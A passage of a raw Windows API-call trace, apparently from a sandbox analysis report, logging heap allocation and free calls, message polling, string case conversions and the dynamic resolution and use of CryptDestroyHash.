[0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0260.367] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.368] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.368] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.368] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.369] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0260.369] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.370] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.370] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0260.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.370] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.370] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0260.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0260.371] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0260.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0260.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0260.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.372] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0260.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0260.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0260.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0260.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.373] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0260.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0260.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0260.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0260.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0260.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0260.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0260.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.376] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: 